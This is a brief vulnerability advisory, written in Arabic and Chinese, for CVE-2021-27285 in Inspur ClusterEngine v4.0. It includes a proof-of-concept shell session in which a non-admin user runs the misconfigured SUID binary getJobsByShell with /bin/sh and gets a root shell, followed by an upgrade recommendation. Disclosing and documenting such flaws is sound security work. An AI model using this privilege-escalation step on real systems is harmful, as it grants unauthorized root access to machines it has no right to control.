
استغلال إثبات المفهوم لسوء تهيئة SUID في Inspur ClusterEngine (CVE-2021-27285) الذي يمكّن المستخدمين غير المسؤولين من رفع صلاحياتهم إلى الجذر عبر مكون getJobsByShell.
浪潮ClusterEngine集群管理平台是专为浪潮天梭系列HPC产品定制的一款作业管理软件。浪潮ClusterEngine存在suid配置不当的问题,导致非管理员用户可以通过部分组件进行提权获得root权限。
منصة إدارة مجموعات Inspur ClusterEngine هي برنامج إدارة مهام مصمم خصيصًا لمنتجات HPC من سلسلة Inspur TianSuo. يؤدي سوء تكوين إعدادات SUID في Inspur ClusterEngine إلى السماح للمستخدمين غير الإداريين برفع الصلاحيات والحصول على وصول الجذر (root) من خلال بعض المكونات.
浪潮clusterenginev4.0存在组件“/opt/tsce4/torque6/bin/getJobsByShell”suid配置不当问题,非管理员用户能通过suid提权方式获得root权限。
يحتوي Inspur ClusterEngine v4.0 على مشكلة في تكوين SUID غير صحيح مع المكون "/opt/tsce4/torque6/bin/getJobsByShell"، مما يسمح للمستخدمين غير الإداريين برفع الصلاحيات والحصول على وصول الجذر (root) عبر آلية SUID.
عملية رفع الصلاحية هي كما يلي:
[inspur@mu01 ~]$ whoami
inspur
[inspur@mu01 ~]$ /opt/tsce4/torque6/bin/getJobsByShell /bin/sh
sh-4.2# whoami
root
sh-4.2#
修复建议: 升级相关组件
توصية: تصحيح المكونات ذات الصلة.